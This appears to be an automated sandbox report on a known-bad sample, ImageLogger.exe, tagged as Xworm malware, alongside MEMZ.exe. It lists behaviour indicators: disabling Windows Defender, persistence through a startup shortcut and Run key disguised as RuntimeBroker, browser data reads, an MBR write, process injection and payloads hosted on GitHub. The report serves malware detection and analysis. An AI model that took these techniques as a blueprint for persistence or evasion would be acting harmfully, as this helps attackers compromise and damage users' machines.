Analysis Overview
SHA256
5175b805ea8db533ac0b0153899804be3dd8b5151185ef5ef4614ce01f8acbba
Threat Level: Known bad
The file ImageLogger.exe was found to be: Known bad.
Malicious Activity Summary
Contains code to disable Windows Defender
Xworm
Detect Xworm Payload
Xworm family
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Checks computer location settings
Reads user/profile data of web browsers
Drops startup file
Loads dropped DLL
Writes to the Master Boot Record (MBR)
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Adds Run key to start application
Drops desktop.ini file(s)
Enumerates connected drives
Suspicious use of SetThreadContext
Sets desktop wallpaper using registry
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Unsigned PE
Uses Volume Shadow Copy service COM API
Suspicious behavior: AddClipboardFormatListener
Checks processor information in registry
Checks SCSI registry key(s)
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Modifies registry class
Enumerates system info in registry
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Modifies data under HKEY_USERS
Scheduled Task/Job: Scheduled Task
Suspicious use of SetWindowsHookEx
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-21 16:47
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-21 16:47
Reported
2024-06-21 17:11
Platform
win10v2004-20240611-en
Max time kernel
749s
Max time network
760s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\MEMZ.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\MEMZ.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker.exe" | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Searches\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-2080292272-204036150-2159171770-1000\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\3D Objects\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\OneDrive\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Saved Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Camera Roll\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\Contacts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\O: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\Downloads\MEMZ.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XBackground.bmp" | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1424 set thread context of 1120 | N/A | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\dotnet\host\fxr\6.0.27\hostfxr.dll | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSI239F.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI23EF.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI3238.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI3277.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000000000000187f58750000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2A\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133634628102897978" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\497A7447E2AFEB24ABA9F5BC5DC4D53F\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\497A7447E2AFEB24ABA9F5BC5DC4D53F | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Rev = "0" | C:\Windows\explorer.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\497A7447E2AFEB24ABA9F5BC5DC4D53F\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616193" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\explorer.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\497A7447E2AFEB24ABA9F5BC5DC4D53F | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | C:\Windows\explorer.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A1A5B816FCD50AC5256C8FA1FB47CF92 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656} | C:\Windows\explorer.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\497A7447E2AFEB24ABA9F5BC5DC4D53F\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
